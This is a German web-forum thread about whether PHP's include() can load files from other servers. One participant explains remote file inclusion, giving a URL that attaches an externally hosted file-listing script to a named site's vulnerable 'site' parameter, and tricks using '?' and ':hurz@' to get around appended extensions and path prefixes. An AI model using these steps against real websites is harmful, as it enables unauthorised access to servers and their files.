✔ Funzt include() auch mit Dateien von anderen Servern?

[SilentWarrior]

Moin

Jaaa... also... öööh... der Titel sagt eigentlich schon alles. Ich hab mal irgendwo gelesen, dass man das zwar kann, aber die Variablen nicht zur Verfügung stehen oder sowas - stimmt das?

Anm.: Ist nicht so, dass ich einfach zu faul bin zums ausprobieren. Aber ich müsste einen neuen Account machen, den ganzen Code schreiben und am Schluss feststellen dasses nicht geht. Da verlass ich mich doch lieber auf mein Lieblingsforum *auf schleimspur ausrutsch*

 

[brÅinstorm]

ja. das geht. und man hat zugriff auf variablen.

nehmen wir eine unvorsichtige seite, die direkt aus der url includen:

http://www.schnittentreff.de/index.php?site=about.php

nehmen wir ein lustiges script, das auf dem server alle dateien anzeigt und hängen es daran:

http://www.schnittentreff.de/index....ngelfire.com/rebellion/rebelliontool/list.txt

schon haben wir zugriff auf die dateien.

also sollte man aufpassen.
an die mods: ich habe ihnen den fehler schon geschildert. löscht zur not die links.

 

[Sebastian Wramba]

kommt es nicht auf den include_path in der php.ini an?

 

[brÅinstorm]

sobald ein "http://" davor steht benutzt php den http-grabber und wirft seinen include_path in den nächstliegenden papierkorb.

 

[Sebastian Wramba]

also geht das bei allen seiten die mit dateiendung includen!?

 

[brÅinstorm]

nicht nur bei denen, die mit dateiendung includen, sondern bei allen, welche daten für den dateinamen direkt aus der uri nehmen.

wenn du nun noch .php im script dahinter schreibst, schreibe ich hinter meine url noch ein ?, schon wird dein .php als get-argument angesehen.

gehen wir davon aus, du includest lokal von deinem eigenen server. (Bsp: include('inc/' . $_GET['site'] . '.php');

In diesem Fall kann man noch ein :hurz@ vor die eigene zu includende datei setzen, somit wird dein pfad als username und hurz als password auf meine eigene datei angewandt. ist die datei nicht schreibgeschützt, wird sie auch geladen.

natürlich darf meine datei nicht vorher schon geparst werden, am besten kann man sie als .txt sichern.

[OT]
man könnte dazu schon fast ein security-tutorial dazu schreiben. =)
[/OT]

 

[Sebastian Wramba]

hm... also unter bestimmten voraussetzungen geht das überall!?

natürlich darf meine datei nicht vorher schon geparst werden

was genau meinst du damit?

 

[brÅinstorm]

ja. genau. dazu müssen noch die fopen-wrapper aktiviert sein.

ich meine damit, dass sobald du es als php-datei auf deinem php-fahigen server speicherst, es ja ausgeführt wird. es wird also dein eigener verzeichnisinhalt angezeigt zum beispiel. Im endeffekt includest du dann nur noch html. die datei, die du per GET übergibst, muss noch alle php tags beinhalten.